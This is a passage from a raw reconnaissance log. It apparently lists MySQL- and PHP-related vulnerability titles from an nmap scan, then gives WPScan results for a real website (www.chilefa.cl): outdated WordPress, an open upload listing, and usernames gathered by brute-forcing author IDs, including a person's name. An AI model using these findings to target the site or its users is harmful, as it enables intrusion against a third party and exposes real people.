10888| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
10889| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
10890| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
10891| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
10892| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
10893| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
10894| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
10895| [67381] MySQL InnoDB Temporary Table Handling DoS
10896| [67380] MySQL BINLOG Statement Unspecified Argument DoS
10897| [67379] MySQL Multiple Operation NULL Argument Handling DoS
10898| [67378] MySQL Unique SET Column Join Statement Remote DoS
10899| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
10900| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
10901| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
10902| [66731] PHP Bundled MySQL Library Unspecified Issue
10903| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
10904| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
10905| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
10906| [65085] MySQL Enterprise Monitor Unspecified CSRF
10907| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
10908| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
10909| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
10910| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
10911| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
10912| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
10913| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
10914| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
10915| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
10916| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
10917| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
10918| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
10919| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
10920| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
10921| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
10922| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
10923| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
10924| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
10925| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
10926| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
10927| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
10928| [59907] MySQL on Windows bind-address Remote Connection Weakness
10929| [59906] MySQL on Windows Default Configuration Logging Weakness
10930| [59616] MySQL Hashed Password Weakness
10931| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
10932| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
10933| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
10934| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
10935| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
10936| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
10937| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
10938| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
10939| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
10940| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
10941| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
10942| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
10943| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
10944| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
10945| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
10946| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
10947| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
10948| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
10949| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
10950| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
10951| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
10952| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
10953| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
10954| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
10955| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
10956| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
10957| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
10958| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
10959| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
10960| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
10961| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
10962| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
10963| [52464] MySQL charset Column Truncation Weakness
10964| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
10965| [52378] Cisco ANM MySQL root Account Default Password
10966| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
10967| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
10968| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
10969| [50892] MySQL Calendar index.php username Parameter SQL Injection
10970| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
10971| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
10972| [48710] MySQL Command Line Client HTML Output XSS
10973| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
10974| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
10975| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
10976| [47789] mysql-lists Unspecified XSS
10977| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
10978| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
10979| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
10980| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
10981| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
10982| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
10983| [43179] MySQL Server BINLOG Statement Rights Checking Failure
10984| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
10985| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
10986| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
10987| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
10988| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
10989| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
10990| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
10991| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
10992| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
10993| [39279] PHP mysql_error() Function XSS
10994| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
10995| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
10996| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
10997| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
10998| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
10999| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
11000| [37782] MySQL Community Server External Table View Privilege Escalation
11001| [37781] MySQL ALTER TABLE Information Disclosure
11002| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
11003| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
11004| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
11005| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
11006| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
11007| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
11008| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
11009| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
11010| [36251] Associated Press (AP) Newspower Default MySQL root Password
11011| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
11012| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
11013| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
11014| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
11015| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
11016| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
11017| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
11018| [33974] MySQL information_schema Table Subselect Single-Row DoS
11019| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
11020| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
11021| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
11022| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
11023| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
11024| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
11025| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
11026| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
11027| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
11028| [32056] BTSaveMySql Direct Request Config File Disclosure
11029| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
11030| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
11031| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
11032| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
11033| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
11034| [29696] MySQLDumper sql.php db Parameter XSS
11035| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
11036| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
11037| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
11038| [28288] MySQL Instance_options::complete_initialization Function Overflow
11039| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11040| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11041| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11042| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
11043| [28012] MySQL Case Sensitivity Unauthorized Database Creation
11044| [27919] MySQL VIEW Access information_schema.views Information Disclosure
11045| [27703] MySQL MERGE Table Privilege Persistence
11046| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
11047| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
11048| [27416] MySQL Server time.cc date_format Function Format String
11049| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
11050| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
11051| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
11052| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
11053| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
11054| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
11055| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
11056| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
11057| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
11058| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
11059| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
11060| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
11061| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
11062| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
11063| [25595] Apple Mac OS X MySQL Manager Blank root Password
11064| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
11065| [25227] MySQL COM_TABLE_DUMP Packet Overflow
11066| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
11067| [24245] Cholod Mysql Based Message Board Unspecified XSS
11068| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
11069| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
11070| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
11071| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
11072| [23526] MySQL Query NULL Charcter Logging Bypass
11073| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
11074| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
11075| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
11076| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
11077| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
11078| [22479] PHP mysqli Extension Error Message Format String
11079| [22232] PHP Pipe Variable mysql_connect() Function Overflow
11080| [21685] MySQL Auction Search Module keyword XSS
11081| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
11082| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
11083| [19457] aMember Pro mysql.inc.php Remote File Inclusion
11084| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
11085| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
11086| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
11087| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
11088| [18896] MySQL User-Defined Function init_syms() Function Overflow
11089| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
11090| [18894] MySQL drop database Request Remote Overflow
11091| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
11092| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
11093| [18406] MySQL Eventum releases.php SQL Injection
11094| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
11095| [18404] MySQL Eventum custom_fields.php SQL Injection
11096| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
11097| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
11098| [18401] MySQL Eventum list.php release Parameter XSS
11099| [18400] MySQL Eventum view.php id Parameter XSS
11100| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
11101| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
11102| [17223] xMySQLadmin Symlink Arbitrary File Deletion
11103| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
11104| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
11105| [16056] Plans Unspecified mySQL Remote Password Disclosure
11106| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
11107| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
11108| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
11109| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
11110| [14748] MySQL MS-DOS Device Names Request DoS
11111| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
11112| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
11113| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
11114| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
11115| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
11116| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
11117| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
11118| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
11119| [12919] MySQL MaxDB WebAgent websql Remote Overflow
11120| [12779] MySQL User Defined Function Privilege Escalation
11121| [12609] MySQL Eventum projects.php Multiple Parameter XSS
11122| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
11123| [12607] MySQL Eventum forgot_password.php email Parameter XSS
11124| [12606] MySQL Eventum index.php email Parameter XSS
11125| [12605] MySQL Eventum Default Vendor Account
11126| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
11127| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
11128| [11689] Roxen Web Server MySQL Socket Permission Weakness
11129| [10985] MySQL MATCH..AGAINST Query DoS
11130| [10959] MySQL GRANT ALL ON Privilege Escalation
11131| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
11132| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
11133| [10658] MySQL mysql_real_connect() Function Remote Overflow
11134| [10532] MySQL MaxDB webdbm Server Field DoS
11135| [10491] AWS MySQLguest AWSguest.php Script Insertion
11136| [10244] MySQL libmysqlclient Prepared Statements API Overflow
11137| [10226] MySQLGuest AWSguest.php Multiple Field XSS
11138| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
11139| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
11140| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
11141| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
11142| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
11143| [9907] MySQL SELECT Statement String Handling Overflow
11144| [9906] MySQL GRANT Privilege Arbitrary Password Modification
11145| [9509] teapop MySQL Authentication Module SQL Injection
11146| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
11147| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
11148| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
11149| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
11150| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
11151| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
11152| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
11153| [8886] MySQL libmysqlclient Library read_one_row Overflow
11154| [8885] MySQL libmysqlclient Library read_rows Overflow
11155| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
11156| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
11157| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
11158| [7128] MySQL show database Database Name Exposure
11159| [6716] MySQL Database Engine Weak Authentication Information Disclosure
11160| [6605] MySQL mysqld Readable Log File Information Disclosure
11161| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
11162| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
11163| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
11164| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
11165| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
11166| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
11167| [520] MySQL Database Name Traversal Arbitrary File Modification
11168| [380] MySQL Server on Windows Default Null Root Password
11169| [261] MySQL Short Check String Authentication Bypass
11170|_
111717777/tcp filtered cbt
111728080/tcp filtered http-proxy
111738443/tcp filtered https-alt
1117449152/tcp filtered unknown
11175Service Info: Host: uscentral421.accountservergroup.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
11176#####################################################################################################################################
11177[+] URL: http://www.chilefa.cl/
11178[+] Started: Mon Mar 2 06:22:15 2020
11179
11180Interesting Finding(s):
11181
11182[+] http://www.chilefa.cl/
11183 | Interesting Entry: Server: nginx/1.14.0
11184 | Found By: Headers (Passive Detection)
11185 | Confidence: 100%
11186
11187[+] http://www.chilefa.cl/robots.txt
11188 | Interesting Entries:
11189 | - /wp-admin/
11190 | - /wp-includes/
11191 | Found By: Robots Txt (Aggressive Detection)
11192 | Confidence: 100%
11193
11194[+] http://www.chilefa.cl/fantastico_fileslist.txt
11195 | Found By: Fantastico Fileslist (Aggressive Detection)
11196 | Confidence: 70%
11197 | Reference: http://www.acunetix.com/vulnerabilities/fantastico-fileslist/
11198
11199[+] http://www.chilefa.cl/xmlrpc.php
11200 | Found By: Headers (Passive Detection)
11201 | Confidence: 100%
11202 | Confirmed By:
11203 | - Link Tag (Passive Detection), 30% confidence
11204 | - Direct Access (Aggressive Detection), 100% confidence
11205 | References:
11206 | - http://codex.wordpress.org/XML-RPC_Pingback_API
11207 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
11208 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
11209 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
11210 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
11211
11212[+] Upload directory has listing enabled: http://www.chilefa.cl/wp-content/uploads/
11213 | Found By: Direct Access (Aggressive Detection)
11214 | Confidence: 100%
11215
11216[+] http://www.chilefa.cl/wp-cron.php
11217 | Found By: Direct Access (Aggressive Detection)
11218 | Confidence: 60%
11219 | References:
11220 | - https://www.iplocation.net/defend-wordpress-from-ddos
11221 | - https://github.com/wpscanteam/wpscan/issues/1299
11222
11223[+] WordPress version 3.5.1 identified (Insecure, released on 2013-01-24).
11224 | Found By: Rss Generator (Passive Detection)
11225 | - http://www.chilefa.cl/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11226 | - http://www.chilefa.cl/comments/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11227
11228[+] WordPress theme in use: trymee
11229 | Location: http://www.chilefa.cl/wp-content/themes/trymee/
11230 | Readme: http://www.chilefa.cl/wp-content/themes/trymee/readme.txt
11231 | Style URL: http://www.chilefa.cl/wp-content/themes/trymee/style.css
11232 | Style Name: TryMee
11233 | Style URI: http://trymee.cmsmasters.net/
11234 | Description: The TryMee theme for WordPress created by CMSMasters is sophisticated, lightweight, and adaptable. M...
11235 | Author: cmsmasters
11236 | Author URI: http://cmsmasters.net/
11237 |
11238 | Found By: Css Style In Homepage (Passive Detection)
11239 | Confirmed By: Css Style In 404 Page (Passive Detection)
11240 |
11241 | Version: 1.3 (80% confidence)
11242 | Found By: Style (Passive Detection)
11243 | - http://www.chilefa.cl/wp-content/themes/trymee/style.css, Match: 'Version: 1.3'
11244
11245[+] Enumerating All Plugins (via Passive Methods)
11246[+] Checking Plugin Versions (via Passive and Aggressive Methods)
11247
11248[i] Plugin(s) Identified:
11249
11250[+] sitepress-multilingual-cms
11251 | Location: http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/
11252 | Latest Version: 2.0.4.1 (up to date)
11253 | Last Updated: 2011-06-05T13:40:00.000Z
11254 |
11255 | Found By: Urls In Homepage (Passive Detection)
11256 | Confirmed By:
11257 | Urls In 404 Page (Passive Detection)
11258 | Meta Generator (Passive Detection)
11259 |
11260 | Version: 3.1.8.2 (70% confidence)
11261 | Found By: Meta Generator (Passive Detection)
11262 | - http://www.chilefa.cl/, Match: 'WPML ver:3.1.8.2 stt'
11263 | Confirmed By: Query Parameter (Passive Detection)
11264 | - http://www.chilefa.cl/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.8.2
11265
11266[+] wpml-cms-nav
11267 | Location: http://www.chilefa.cl/wp-content/plugins/wpml-cms-nav/
11268 |
11269 | Found By: Urls In Homepage (Passive Detection)
11270 | Confirmed By: Urls In 404 Page (Passive Detection)
11271 |
11272 | The version could not be determined.
11273
11274[+] Enumerating Config Backups (via Passive and Aggressive Methods)
11275 Checking Config Backups - Time: 00:00:03 <=============> (21 / 21) 100.00% Time: 00:00:03
11276
11277[i] No Config Backups Found.
11278
11279[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
11280[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
11281
11282[+] Finished: Mon Mar 2 06:22:41 2020
11283[+] Requests Done: 49
11284[+] Cached Requests: 25
11285[+] Data Sent: 12.923 KB
11286[+] Data Received: 179.649 KB
11287[+] Memory used: 195.098 MB
11288[+] Elapsed time: 00:00:25
11289######################################################################################################################################
11290[+] URL: http://www.chilefa.cl/
11291[+] Started: Mon Mar 2 06:22:07 2020
11292
11293Interesting Finding(s):
11294
11295[+] http://www.chilefa.cl/
11296 | Interesting Entry: Server: nginx/1.14.0
11297 | Found By: Headers (Passive Detection)
11298 | Confidence: 100%
11299
11300[+] http://www.chilefa.cl/robots.txt
11301 | Interesting Entries:
11302 | - /wp-admin/
11303 | - /wp-includes/
11304 | Found By: Robots Txt (Aggressive Detection)
11305 | Confidence: 100%
11306
11307[+] http://www.chilefa.cl/fantastico_fileslist.txt
11308 | Found By: Fantastico Fileslist (Aggressive Detection)
11309 | Confidence: 70%
11310 | Reference: http://www.acunetix.com/vulnerabilities/fantastico-fileslist/
11311
11312[+] http://www.chilefa.cl/xmlrpc.php
11313 | Found By: Headers (Passive Detection)
11314 | Confidence: 100%
11315 | Confirmed By:
11316 | - Link Tag (Passive Detection), 30% confidence
11317 | - Direct Access (Aggressive Detection), 100% confidence
11318 | References:
11319 | - http://codex.wordpress.org/XML-RPC_Pingback_API
11320 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
11321 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
11322 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
11323 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
11324
11325[+] Upload directory has listing enabled: http://www.chilefa.cl/wp-content/uploads/
11326 | Found By: Direct Access (Aggressive Detection)
11327 | Confidence: 100%
11328
11329[+] http://www.chilefa.cl/wp-cron.php
11330 | Found By: Direct Access (Aggressive Detection)
11331 | Confidence: 60%
11332 | References:
11333 | - https://www.iplocation.net/defend-wordpress-from-ddos
11334 | - https://github.com/wpscanteam/wpscan/issues/1299
11335
11336[+] WordPress version 3.5.1 identified (Insecure, released on 2013-01-24).
11337 | Found By: Rss Generator (Passive Detection)
11338 | - http://www.chilefa.cl/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11339 | - http://www.chilefa.cl/comments/feed/, <generator>http://wordpress.org/?v=3.5.1</generator>
11340
11341[+] WordPress theme in use: trymee
11342 | Location: http://www.chilefa.cl/wp-content/themes/trymee/
11343 | Readme: http://www.chilefa.cl/wp-content/themes/trymee/readme.txt
11344 | Style URL: http://www.chilefa.cl/wp-content/themes/trymee/style.css
11345 | Style Name: TryMee
11346 | Style URI: http://trymee.cmsmasters.net/
11347 | Description: The TryMee theme for WordPress created by CMSMasters is sophisticated, lightweight, and adaptable. M...
11348 | Author: cmsmasters
11349 | Author URI: http://cmsmasters.net/
11350 |
11351 | Found By: Css Style In Homepage (Passive Detection)
11352 | Confirmed By: Css Style In 404 Page (Passive Detection)
11353 |
11354 | Version: 1.3 (80% confidence)
11355 | Found By: Style (Passive Detection)
11356 | - http://www.chilefa.cl/wp-content/themes/trymee/style.css, Match: 'Version: 1.3'
11357
11358[+] Enumerating Users (via Passive and Aggressive Methods)
11359 Brute Forcing Author IDs - Time: 00:00:11 <==> (10 / 10) 100.00% Time: 00:00:11
11360
11361[i] User(s) Identified:
11362
11363[+] Gabriel Aviles
11364 | Found By: Rss Generator (Passive Detection)
11365 | Confirmed By: Rss Generator (Aggressive Detection)
11366
11367[+] gaviles
11368 | Found By: Rss Generator (Passive Detection)
11369 | Confirmed By:
11370 | Rss Generator (Aggressive Detection)
11371 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11372 | Login Error Messages (Aggressive Detection)
11373
11374[+] javiles
11375 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
11376 | Confirmed By: Login Error Messages (Aggressive Detection)
11377
11378[+] admin
11379 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
